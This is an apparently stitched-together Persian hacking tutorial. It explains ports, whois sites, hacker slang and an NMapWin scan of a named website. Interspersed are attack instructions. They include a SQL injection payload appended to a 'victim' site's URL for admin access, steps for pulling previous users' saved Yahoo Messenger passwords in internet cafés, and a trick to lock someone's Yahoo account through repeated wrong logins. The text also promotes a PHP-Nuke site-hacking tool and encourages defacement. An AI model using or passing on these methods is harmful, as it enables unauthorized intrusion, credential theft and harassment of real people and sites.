کاربرد پورت 13:

نام دیگر اونdaytime است و کارش هم اینه که زمان و تاریخ رو در اون کامپیتر به ما می ده . این پورت اصولا خیلی سر راسته . فقط کافیه که بهش وصل شیم تا اطلاعاتشون بیرون بریزه .البته این پورت رو خیلی از کامپینر ها بسته است.

کار با پورت7:

اسم این پورتechoاست این پورت رو پورت میمون می گم چون هر چی که شما براش بنویسید پس می فرستد

کار با پورت79:

پورت79را پورتfingerمی گویند کاربرد این پورت به اوایل ایجاد اینترنت بر میگرده و کاربردش مخصوص سیستم عامل یونیکس بوده است

وقتی این پورت روی سیستم عامل یونیکس باز باشه می شه با یک reguestساده فهمیدکه از بین کسانی که درآن سیستم accountدارند کدان ها onهستند برنامه ای که پورت 79 رو در یک سیستم باز می کنه finger serverمی گن و چون مختص سیستم عامل یونیکس است  می تونین از عبارت finger deamonاستفاده کنین

کا ر  با پورت80:

پورت 80 یکی ازمهمترین پورت هاست. دنیای وب بر اساس همین پورت کار می کنه توضیح اینکه وقتی بهیه سایت وصل می شیم و صفحه وب را در خواست می کنیم در واقع مرور گر اینترنتی به پورت80 اون کامپیوتر وصل می شه و اطلاعات رو می گیره

کار با پورت21:

سرویس های ذاتی پورت های 20و21 عملیات پروتکل انتقال فایل ftpرا فراهم می آورند. برای آنکه فایلی بتواند روی یک کارگزار ftpذخیره شود یا از آن دریافت شود یک اتصال داده ای جداگانه را باید به طور هم زمان به کار گرفت این اتصال داده ای معمولا از طریق داده های ftpپورت21 آغاز می شود. در روال های عملیاتی استاندارد.چملات کنترل انتقال فایل لز طریق پورت 21دیکته می شود این پورت معمولا به عنوان اتصال کنترلی شناخته می شود زیرا اصولا برای ارسال فرمانها و دریافت پاسخ های مربوط به آنها به کار می رود صفات ftp شامل توانایی کپی ,تغییر و حذف فایل ها یا شاحه ها می شود

تقسیم بندی پورت ها از روی شماره آنها:

1-     پورت 0تا 1023

مشهورترین پورت ها هستند و معمولا هر کدام برای سرویس خاص استفاده می شود

2-پورت1023تا 49151

این سری از پورت ها مشخصا با هیچ یک از سرویس های اینترنتی مرتبط نیستند بلکه وقتی که با یک ایزار شبکه مانند مرورگر اینترنت (مثل internet exploreیا netscape navigator),,,,, نرم افزار ارسال و دریافت email(مثلoutlookیاedura),,,,,نرم افزار های ftp(مثلws-ftpیاcute-ftp)کار می کنید,,,,,یکی از این پورت ها به صورتrandomباز شده و یک ارتباط با سرور (با توجه به نوع سرویس اینترنتی که می دهد که یکی از پورت های 0تا1023است)برقرار شده و داده ها ارسال و دریافت می شوند . یعنی پورت شما یکی از پورت های این قسمت است و پورت سرور یکی از پورتهای بالا یی .این سری پورتهایregisterشده هم می گویند.

3-پورت 49151تا65535

این سری پورت هابه ندرت استفاده می شوند . کاربرد اساسی آنها برای یک سری سرویس های خاص اینترنتی است و یا توسط trojanها است. البته خیلی از trojanهای معروف از پورت های ردیف 2 هم استفاده می کنندو این تقسیم بندی ها همیشه برقرار نیست و به همین علت است  که گاهی پورت ها را به دودسته زیر1024وبالای1024 تقسیم می کنند  

بجث dns whois

اگرwhoisرو تست کرده باشید می دانید که برای یک سری ازdomain ها جواب نمی دهد.

مثال آن سایت هایی که دارای دامنه جغرافیایی مثلا ایران هستند که به .irختم می شود

کاری که شما باید برایwhoisکردن انجام دهید. توجه به نوع آن domainاست که از نوع comاست یاirیاbizو... بعد از آن از یکی از سایت های زیر استقاده کنید:

1-internic.net:

برای com,org,net,eduعالی است . برایaero,arpa.biz,coop,info,int,museusm هم می تواند استفاده شود.

صفحه وب مربوط عبارت است ازhttp://www.internic.net/whois.html

یا می توانید مستقیما در مرور گر وب بنویسید

http://internic.net/cgi/whois?type=domain&whois_nic=xxxxxxxxx

به جای xxxxxxxx مثلا باید بنویسیدcloob.com

2-nic.ir

برای irاستفا ده می شود

صفحه وب مربوط عبارت است ازhttp://whois.nic.ir/

3-www.tv

برای tv, biz,info,ccعالی است

صفحه وب مربوط عبارت است از http://www.tv/

یا می توانید مستقیما در مرور گر بنویسید

http://www.tv/en-def-8e33e8cf5e3c/cgi-bin/whois.cgi?domain=yyyyyy&tld=zzzz

که اگر بخواهم مثلا hack.tvرا whoisکنم به جای yyyyyباید بنویسید hackو یه جای zzzz باید بنویسیدtv

4-domainpeople.com

برایcom,net,info,org,biz,nameعالی است

صفحه وب مربوط عبارت است ازhttp://whois.domainpeople.com/

چگونه سايت های PHP-Nuke  را هک کنيم؟
برای اين منظور گروه امنيتی هکران شيراز بسته ی آموزشی همراه با فيلم و برنامه ی مورد نظری را تهيه ديده است که در آن روش هک کامل يک سايت نمايش داده شده است و کابر می تواند روش های ذکر شده را بر روی سايت های ديگر نيز پياده سازی نمايد. برنامه ی مورد استفاده در اين بسته ی آموزشی سايت مورد نظر را از نظر ۱۵ باگ امنيتی در PHP-Nuke  چک می کند و در صورت آسيب پذير بودن لينک حمله را در اختيار کاربر قرار می دهد و کاربر می تواتد با رفتن به نشانی داده شده از سوی برنامه به سايت نفوذ پيدا کرده و آن را هک نمايد. شکل برنامه ی مورد استفاده

اين برنامه بر روی سايت های PHP-Nuke ورژن ۷.۹ فينال کار می کند که شما می توانيد با جستجو در جستجوگرهای اينترنتی سايت های بيشماری را پيدا کرده و آنها را با برنامه ی فوق مورد آزمايش قرار دهيد.اين برنامه از طرف گروه امنيتی هکران شيراز برای تمامی هموطنان عزيز فراهم شده است و از اين جهت اين برنامه کاملا رايگان و عمومی بوده و تمامی کاربران از آن استفاده نمايند

از منوی Start گزینه Run را انتخاب کنید و Regedit را تایپ کنید تا داخل محیط ویرایش ریجستری شوید حالا به این کلیک در ریجستری بروید :

HKEY_CURRENT_USERSoftwareYahooPager

و روی Save Password دو بار کلید کنید و عدد 100 را در آن تایپ کنید و OK بزنید حالا یاهو مسنجر را نگاه کنید آخرین ID و Password ID می بینید می توانید باآن LOGIN بشوید . حال باید یک برنامه که از قبل آمده کرده باشید که پسورد روی ویندوز را بخواند که با آن بتوانید پسورد درون یاهو مسنجر را بخوانید. این کار شما می توانید در کافی نت انجام بدهید چون پسورد شخص قبلی کسی که قبل از شما کار می کرده اگر هم پسورد هم Save نکرده باشه می توانید در بیارید . توجه : شما می خواهید این کارو در کافی نت انجام بدهید اما می بینید هر چی Regedi را در Run تایپ می کنید ویندوز Error به شما می دهد این به آن معنا است که رجستری ویندوز پسورد داره پس شما بیاید به جای Regedi این را regedt32 تایپ کنید

روش نفوذ به وب سرور های php injectio.

اول باید وب سایت های php. رو پیدا کنید . خب حالا بیاین و جلوی عبارت سایت عبارت زیر رو اضافه کنید .

مثلا سایت قربانی این هست :

www.arianhack.tk/index.php

خب حالا میشه مثل زیر :

www.arianhack.tk/index.php/username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*
 

یعنی باید عبارت : username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*

رو جلوش اضافه کنید .

حالا میتونید به جای Admin سایت به سرور نفوذ کنید .

معنی دیفیس:
deface
بدشکل کردن ، ازشکل انداختن ، محو کردن .
===============================
برای اینکه هکر ها یه نشان از خودشون برای نمایش ضعف سایت ها یا سرور ها بجا بگذارن میان و سایت رو دیفیس می کنن.. و مشخصات خودشون رو که احتمالا معرفی اعضای برتر تیم هست وارد می کنن.شما برای اینکه یه صفحه دیفیس داشته باشی بهتره از کدهای جاوا استفاد ه کنی..نمونه ای از این صفحه دیفیس ها در سایت های zone-h و netfigs هست می تونی ببینی و برای خودت طراحی کنی..
برای هک کردن سایت ها هم بهتره از پایه شروع کنی

سلام

ابتدا به قسمت mail در yahoo بروید بعد ID مورد نظر خود را در قسمت مربوطه وارد کنید و در قسمت پسورد یک پسورد اشتباه را ۱۵ بار تکرار کنید . با این کار فرد مورد نظر از ID خود تا ۲۴ ساعت نمیتواند استفاده کند.

(اصطلاح‌شناسی)

- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;


- زنگ ‌تفريح

- تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند

کاربرد نرم‌افزار nmap

- معرفی nmap و NMapWin

اگر بخواهيد مهم‌ترين ابزاری را که يک هکر برای footprinting استفاده می‌کند بدانيد، آن نرم‌افزار nmap خواهد بود که برای سيستم‌های لينوکس و يونيکس طراحی شده است. برای هکرهای تازه‌کار که سيستم‌عامل ويندوز را به کار می‌برند، نسخه گرافيکی و تحت ويندوزی طراحی شده است که NMapWin نام دارد و همان امکانات را فراهم می‌آورد. بحث اين‌ جلسه درباره اين نرم‌افزار است. برای داون‌لود اين نرم‌افزار http://prdownloads.sourceforge.net/nmapwin/nmapwin_1.3.0.exe?use_mirror=twtelecom!  اندازه برنامه 6.18 مگابايت است و اگر اتصالتان dial-up است، کمی طول خواهد کشيد. ضمنا توجه کنيد که اين برنامه مخصوص ويندوز ۲۰۰۰ و xp است.

اين نرم‌افزار مجموعه ابزارهای footprinting مثل پورت اسکن، آی‌پی اسکن، تشخيص سيستم‌عامل کامپيوتر مورد نظر (OS detection) و … را گرد هم آورده است. شکل ظاهری برنامه را در زير می‌بينيد:

- بررسی ظاهر برنامه

شکل ظاهری برنامه چهار قسمت دارد:

۱- Network Section :
بالاترين قسمت پنجره برنامه است که محلی برای ورود ip يا ip‌ ها دارد به نام Host. بعد از وارد کردن ip و تنظيم کردن پارامترها، دکمه Scan را کليک می‌کنيم تا کار اسکن شروع شود.
اگر قرار باشد بيش از يک ip وارد شود، اين کار را می‌توان به صورت‌های مختلف انجام داد. مثلا: *.*.192.130 يعنی تمام ip هايی که با 192.130 شروع می‌شوند ولی دو عدد بعدی هرچيزی می‌تواند باشد. و نوشتن به صورت 15-192.130.120.12 يعنی عدد آخری می‌تواند از ۱۲ تا ۱۵ باشد.

۲- Option Folder :
اين قسمت در واقع محل تنظيمات است و به کمک آن مشخص می‌کنيم که از برنامه می‌خواهيم که چه‌کاری انجام دهد که مفصلا در موردش صحبت خواهم کرد. در اين قسمت، برگه‌هايی با نام‌های Option , Discover , Scan , ... وجود دارد.

۳- Log Output :
محل ظاهر شدن نتايج است. در حالتی که اسکن شروع نشده باشد، خالی است.

۴- Status bar :
پايين‌ترين بخش پنجره برنامه است و دو بخش مهم دارد:
قسمت سمت چپ نشان می‌دهد که اگر بخواهيم در nmap همين کار رو انجام بديم، چه سويچ‌هايی را بايد بکار بريم ( دقت کنيد که nmap برخلاف NMapWin گرافيکی نيست ). هر تغييری که در قسمت Option Folder اعمال کنيم، در اين قسمت تغييری را مشاهده می‌کنيم و توصيه می‌کنم که حتما به اين قسمت توجه ويژه‌ای داشته باشيد.
اما در سمت راست آن، يک مربع کوچک مشاهده می‌شود که می‌تواند به رنگ‌های سبز يا قرمز باشد. سبز يعنی اينکه برنامه آماده برای اجرای دستورات شماست و قرمز يعنی در حال انجام دستورات وارد شده است و فعلا دستور جديد نمی‌پذيرد.


- شروع کار با NMapWin

فرض کنيد که می‌خواهم سايت far30.com رو می‌خواهم مورد بررسی قرار دهم. برای اينکار ابتدا ip رو بدست‌ آورده (63.148.227.65) و در قسمت Host تايپ می‌کنيم. حالا فعلا بدون اعمال تغييری در قسمت Option Folder ، دکمه Scan رو کليک می‌کنيم. اسکن شروع می‌شود و بعد از چند دقيقه، نتايج زير در قسمت Log Output ظاهر می‌شود:

Starting nmap V. 3.00 ( www.insecure.org/nmap )

Interesting ports on  (63.148.227.65):

(The 1583 ports scanned but not shown below are in state: closed)

Port       State       Service

21/tcp     open        ftp                     

25/tcp     open        smtp                    

31/tcp     open        msg-auth                

53/tcp     open        domain                  

80/tcp     open        http                    

110/tcp    open        pop-3                   

135/tcp    open        loc-srv                 

143/tcp    open        imap2                   

443/tcp    open        https                   

445/tcp    open        microsoft-ds            

1025/tcp   open        NFS-or-IIS              

1026/tcp   open        LSA-or-nterm            

1050/tcp   open        java-or-OTGfileshare    

1433/tcp   open        ms-sql-s                

3372/tcp   open        msdtc                   

3389/tcp   open        ms-term-serv            

6666/tcp   open        irc-serv                

7007/tcp   open        afs3-bos                

Remote operating system guess: Windows 2000/XP/ME

Nmap .... -- 1 IP address (1 host up) scanned in 156 seconds

در همين‌جا سه نوع اطلاعات قابل دسترسی است:
۱- ليست پورت‌های باز روی کامپيوتر سرور و کاربرد آن پورت‌ها
۲- تشخيص سيستم عامل که Windows 2000/XP/ME حدس زده شده است (سطر ماقبل آخر)
۳- و سطر آخر می‌گويد که اين ip روشن (up) است.

تعريف ip و port

- IP

شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)


- Port

در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد: